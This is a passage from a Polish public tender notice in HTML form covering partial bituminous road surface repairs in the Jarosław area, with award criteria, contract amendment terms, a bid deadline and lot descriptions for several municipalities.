                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.    Zamawiający    przewiduje    możliwość    dokonania    zmian    w    Umowie    na    poniższych warunkach:
   1) powstania rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w Umowie, których nie będzie można usunąć w inny sposób, a zmiana treści Umowy będzie umożliwiać usunięcie rozbieżności lub 
       niejasności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,
   2) jeżeli nastąpi zmniejszenie zakresu przedmiotu umowy wraz z ograniczeniem należnego Wykonawcy 
       wynagrodzenia,
  3) jeżeli nastąpi zwiększenie zakresu przedmiotu umowy wraz ze wzrostem należnego Wykonawcy        
      wynagrodzenia,
  4) wydłużenia terminu zakończenia realizacji umowy, jeżeli ze względu na konieczność wykonania zamówień dodatkowych niemożliwych wcześniej do przewidzenia (realizowanych odrębną umową zgodnie z art. 67 ust. 1 pkt 5 ustawy Pzp), niemożliwe będzie dotrzymanie terminu zakończenia realizacji prac podstawowych 
      określonego w umowie;
  5) wydłużenia terminu zakończenia realizacji umowy, jeżeli ze względu na konieczność zwiększenia zakresów rzeczowych elementów robót ujętych w Kosztorysie ofertowym (popartych pisemnym uzasadnieniem Inspektora Nadzoru i zaakceptowanych przez Zamawiającego), niemożliwe będzie dotrzymanie terminu zakończenia realizacji usług określonego w umowie,
  6) wystąpienia niesprzyjających warunków atmosferycznych rozumianych jako: ciągłe opady deszczu lub śniegu oraz wysokich temperatur   dłuższych niż 10 dni , uniemożliwiających realizację robót zgodnie z przyjętą technologią - w zakresie terminu realizacji umowy,
  7) z powodu zaistnienia po zawarciu umowy przypadku siły wyższej, przez którą rozumieć się będzie zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej o charakterze niezależnym od Stron, którego Strony nie mogły 
    przewidzieć, i któremu nie mogły zapobiec przy zachowaniu należytej staranności i zaistnienia konieczności wydłużenia terminu zakończenia realizacji umowy na skutek zaistnienia siły wyższej. Za siłę wyższą, 
    warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne. O interpretacji zdarzenia siły wyższej i ewentualnym uznaniu przedłużenia  terminu wykonania robót z tego powodu, będzie decydował Zamawiający w trakcie realizacji robót, po złożeniu    pisemnego wniosku Wykonawcy,
   8) z powodu zaistnienia omyłki pisarskiej lub rachunkowej,
   9) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na  realizację 
       przedmiotu zamówienia lub świadczenia jednej lub obu Stron,
  10) na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty.
  11) zmianach osobowych - zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ, w przypadku kierownika budowy wskazana osoba musi legitymować się doświadczeniem nie mniejszym, niż osoba wskazana w ofercie oraz zamawiający wymaga zatrudnienia jej przez wykonawcę lub podwykonawcę na podstawie umowy o pracę .
  12) zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 22a uat.1 ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby 
      Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia.
13) rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 22a ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia.
2. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować 
   Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
3. Wszelkie zmiany niniejszej umowy z zastrzeżeniem zmian o których mowa w §. 7 ust. 2 umowy, wymagają     zgody   obu Stron w formie pisemnej pod rygorem nieważności. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie Nr1- miasto Jarosław i Radymno<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem   obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
2. Szczegółowy zakres robót  zawiera    kosztorys  ofertowy  stanowiący załącznik do SIWZ  - Rozdział II Formularz Nr 2,  oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 3. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45233140-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  105691.06<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie Nr2  gmina Jarosław i Pawłosiów  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem   obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
2. Szczegółowy zakres robót  zawiera    kosztorys  ofertowy  stanowiący załącznik do SIWZ  - Rozdział II Formularz Nr 2.1,  oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 3. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45233140-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  105691.06<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie Nr3   gmina Laszki i Wiązownica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem   obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
2. Szczegółowy zakres robót  zawiera    kosztorys  ofertowy  stanowiący załącznik do SIWZ  - Rozdział II Formularz Nr 2.2,  oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 3. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45233140-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  138211.38<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie Nr4  gmina Rokietnica i Chłopice<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem   obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
2. Szczegółowy zakres robót  zawiera    kosztorys  ofertowy  stanowiący załącznik do SIWZ  - Rozdział II Formularz Nr 2.3,  oraz  specyfikacje techniczne   wykonania i odbioru robót    zawarte  w  Rozdziale IV niniejszej Specyfikacji  Istotnych Warunków Zamówienia.   
 3. Zaleca się dokonania przez Wykonawców   wizji lokalnej   na terenie będącym przedmiotem niniejszego zamówienia ,  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45233140-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  89430.89<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zadanie Nr5   gmina Pruchnik i Rożwienica <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Szczegółowy zakres przedmiotowy  niniejszego zamówienia swoim zakresem   obejmuje wykonanie:
 1) Roboty remontowe- frezowanie nawierzchni bitumicznych o grub. do 5 cm z wywozem materiału z rozbiórki na    
   odl.   do 5km  wskazaną przez Inspektora Nadzoru,
 2) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków do 5 cm,
 3) Remont cząstkowy nawierzchni bitumicznych mieszanką z grysu i emulsji asfaltowych przy użyciu Remontera 
   przy średniej grub. ubytków powyżej 5 cm,
 4) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego bez obcinania krawędzi,
 5) Remont cząstkowy nawierzchni bitumicznych przy użyciu betonu asfaltowego z obcinaniem krawędzi,
 6) Wyrównanie istniejącej podbudowy tłuczniem kamiennym o grub. 5-10 cm po zagęszczeniu,
 7) Wyrównanie istniejącej nawierzchni betonem asfaltowym mechanicznie.
UWAGA:
 Wykonawca zobowiązany jest prowadzić remont cząstkowy nawierzchni w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. W ciągu dnia remontować można jezdnie jedynie poza godzinami szczytu, natomiast w punktach newralgicznych ( miastach) w godzinach szczytu wyłącznie za zezwoleniem Inspektora Nadzoru Zabrania się wykonywania remontów na głównych ciągach komunikacyjnych (w tym miasta) w piątki i dni przedświąteczne. Na drogach tych i w okresie zabronionym mogą być remontowane miejsca zagrażające bezpieczeństwu ruchu na wyraźne polecenie Inspektora Nadzoru.
Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca. 
 Wykonawca zobowiązany jest do oznakowania miejsca wykonania robót , zgodnie z ROZPORZĄDZENIEM MINISTRA INFRASTRUKTURY z dnia 3 lipca 2003r.w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach i utrzymywania tego oznakowania w należytym stanie przez cały czas wykonywania robót remontowych. 
